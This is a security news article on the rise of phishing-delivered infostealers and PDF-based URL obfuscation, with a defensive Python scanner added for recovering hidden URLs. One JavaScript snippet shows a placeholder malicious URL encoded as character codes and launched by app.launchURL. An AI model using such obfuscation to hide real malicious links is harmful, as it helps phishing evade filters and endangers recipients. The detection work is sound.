Attack Via Infostealers Increased by 84% Via Phishing Emails Per Week

Cybersecurity researchers have documented an alarming surge in infostealer malware distribution through phishing channels, with weekly delivery volume increasing by 84% in 2024 compared to the previous year.

According to recently released data, this upward trend shows no signs of slowing, with early 2025 figures suggesting an even more dramatic 180% increase in weekly volume compared to 2023 baselines.

This growth signals a shift in attack methodology: threat actors increasingly go after user credentials, which can be resold or reused for access, rather than deploying traditional backdoor malware that must be kept running on the victim's machine.

Infostealers represent a particularly insidious class of malicious software designed to extract valuable information from compromised systems.

These programs operate silently in the background, capturing screenshots, logging keystrokes, and most critically, harvesting stored credentials from browsers, cryptocurrency wallets, and password managers.

Once exfiltrated, these credentials fuel subsequent attacks: valid account compromise is now tied with exploitation of public-facing applications as the top initial access vector, each accounting for 30% of security incidents.

The evolution of delivery mechanisms has played a crucial role in the proliferation of these threats. Traditional malicious attachments like ZIP archives and Microsoft Office documents have declined significantly, with malicious ZIP and RAR attachments dropping by 70% and 45% respectively.

Instead, attackers have pivoted toward embedding malicious URLs within seemingly innocuous PDF documents and leveraging trusted cloud platforms to host their malware, effectively circumventing many traditional security controls.

IBM analysts identified AgentTesla as the most prevalent infostealer distributed via phishing emails, followed by FormBook, SnakeKeylogger, and PureLogs Stealer.

Top five infostealers seen on dark web forums (Source – IBM)

Meanwhile, dark web marketplace analysis revealed a 12% year-over-year increase in infostealer listings, with Lumma dominating the underground economy, followed by RisePro, Vidar, Stealc, and RedLine.

This thriving criminal ecosystem demonstrates the profitability and sustainability of credential harvesting operations.

“Credential harvesting was observed in 28% of all security incidents we responded to in 2024,” noted Charles Henderson, Head of IBM X-Force.

“Often, these stolen credentials allow attackers to remain undetected for extended periods as they move laterally through environments, making detection and remediation exceedingly difficult.”

PDF Obfuscation Techniques: The Hidden Danger

The shift toward PDF-based delivery mechanisms represents one of the most sophisticated evolutions in the infostealer landscape.

Threat actors have embraced PDF files because they are universally trusted document formats with complex structures that can effectively conceal malicious code.

Analysis of malicious PDFs reveals that 42% used obfuscated URLs, 28% hid their URLs in PDF streams, and 7% were delivered in encrypted form with an accompanying password.

These obfuscation techniques typically encode the malicious URL as character codes (decimal or hexadecimal) or bury it in obfuscated JavaScript, so the literal string never appears in the file.

For example, a typical obfuscated URL might be encoded as:

// Rebuild the URL from decimal character codes so the literal string
// never appears in the file; Acrobat's app.launchURL() then opens it.
var url = String.fromCharCode(104,116,116,112,115,58,47,47,109,97,108,119,97,114,101,46,115,105,116,101);
app.launchURL(url);

When executed, this resolves to the plain string “https://malware.site”, but a scanner that searches the file for literal URL strings sees only a list of numbers.

Moreover, threat actors frequently place the action or script inside compressed or encoded PDF streams (for example with the FlateDecode or ASCIIHexDecode filters), so a tool that inspects only the raw bytes of the file never sees the URL; when the whole PDF is additionally encrypted with a password sent in the email body, the gateway cannot read the content at all until the recipient supplies it.
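To make the detection side concrete, the following is an added example in Python, not code from the article or from IBM. It builds a constructed sample PDF that hides three URLs the ways described above (a String.fromCharCode JavaScript action like the snippet shown earlier, a /URI action inside a FlateDecode-compressed stream, and a PDF hex string), then inflates the streams and undoes the encodings to recover them. It goes beyond the article's single decimal case by also handling JavaScript \xNN escapes and PDF hex strings. The domains malware.site, example.invalid and hex.example.invalid are placeholders, and the PDF is deliberately minimal (no xref table): enough for this scanner, not a spec-complete file.

```python
"""Recover URLs hidden by String.fromCharCode decimal codes, JavaScript
\\xNN hex escapes, PDF hex strings <...>, and FlateDecode-compressed streams.
Added example; the sample PDF below is constructed, not a real lure."""
import re
import zlib

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
FROMCHARCODE_RE = re.compile(rb"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
JS_HEX_RE = re.compile(rb'"((?:\\x[0-9A-Fa-f]{2})+)"')
PDF_HEXSTR_RE = re.compile(rb"<([0-9A-Fa-f\s]{8,})>")
URL_RE = re.compile(rb"https?://[A-Za-z0-9._~:/?#@!$&'*+,;=%-]+")


def build_sample_pdf() -> bytes:
    """Constructed minimal PDF hiding three hypothetical URLs, each a different way."""
    js = (b"var url = String.fromCharCode(104,116,116,112,115,58,47,47,"
          b"109,97,108,119,97,114,101,46,115,105,116,101); app.launchURL(url);")
    flate_obj = zlib.compress(
        b"<< /Type /Action /S /URI /URI (https://example.invalid/payload.pdf) >>")
    hex_uri = b"https://hex.example.invalid/".hex().encode()   # PDF hex string body
    return (b"%PDF-1.7\n"
            b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
            b"2 0 obj << /S /JavaScript /JS (" + js + b") >> endobj\n"
            b"3 0 obj << /Length " + str(len(flate_obj)).encode() +
            b" /Filter /FlateDecode >>\nstream\n" + flate_obj + b"\nendstream\nendobj\n"
            b"4 0 obj << /S /URI /URI <" + hex_uri + b"> >> endobj\n"
            b"%%EOF\n")


def decode_layers(data: bytes) -> list[bytes]:
    """Raw bytes plus the inflated body of every stream that zlib accepts."""
    views = [data]
    for m in STREAM_RE.finditer(data):
        try:
            views.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue  # not Flate-compressed (or damaged); raw bytes are already in views
    return views


def deobfuscate(view: bytes) -> bytes:
    """Rewrite the three encodings into literal strings so URL_RE can see them."""
    def from_charcode(m: re.Match) -> bytes:
        # JavaScript masks each code to a 16-bit unit; mirror that before chr()
        codes = [int(c) & 0xFFFF for c in m.group(1).split(b",") if c.strip()]
        return b'"' + "".join(map(chr, codes)).encode("utf-8", "replace") + b'"'

    def js_hex(m: re.Match) -> bytes:
        return b'"' + bytes.fromhex(m.group(1).replace(b"\\x", b"").decode()) + b'"'

    def pdf_hex(m: re.Match) -> bytes:
        digits = re.sub(rb"\s", b"", m.group(1))
        if len(digits) % 2:           # PDF spec: an odd trailing digit is padded with 0
            digits += b"0"
        return b"(" + bytes.fromhex(digits.decode()) + b")"

    view = FROMCHARCODE_RE.sub(from_charcode, view)
    view = JS_HEX_RE.sub(js_hex, view)
    return PDF_HEXSTR_RE.sub(pdf_hex, view)


def find_urls(pdf: bytes) -> list[str]:
    """Distinct URLs visible after inflating streams and undoing the encodings,
    in order of first appearance."""
    found: list[str] = []
    for view in decode_layers(pdf):
        for m in URL_RE.finditer(deobfuscate(view)):
            url = m.group(0).decode("ascii", "replace")
            if url not in found:
                found.append(url)
    return found


if __name__ == "__main__":
    for url in find_urls(build_sample_pdf()):
        print(url)
```

Run stand-alone it prints the three recovered URLs, which a gateway would then hand to reputation and sandbox checks. The scanner is regex-based and only knows the encodings it was written for (it will miss ASCII85Decode streams, URLs assembled by string concatenation, or a password-encrypted file), which is why gateway inspection needs the endpoint and identity controls discussed below behind it.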

These PDF-based attacks have particularly targeted Latin American financial institutions, with banking trojans like Grandoreiro, Mekotio, and Guildma being distributed through cloud-hosted infrastructure.

The combination of obfuscated URLs, a trusted file format, and legitimate hosting platforms lets these campaigns slip past controls that key on suspicious attachments or known-bad domains. Defending against them requires layered controls that extend beyond email scanning: PDF content inspection and URL analysis at the gateway, endpoint protection that can catch the stealer once it runs, and identity controls that limit what a stolen credential is worth, since the credential, not the malware, is what the attacker ultimately keeps.
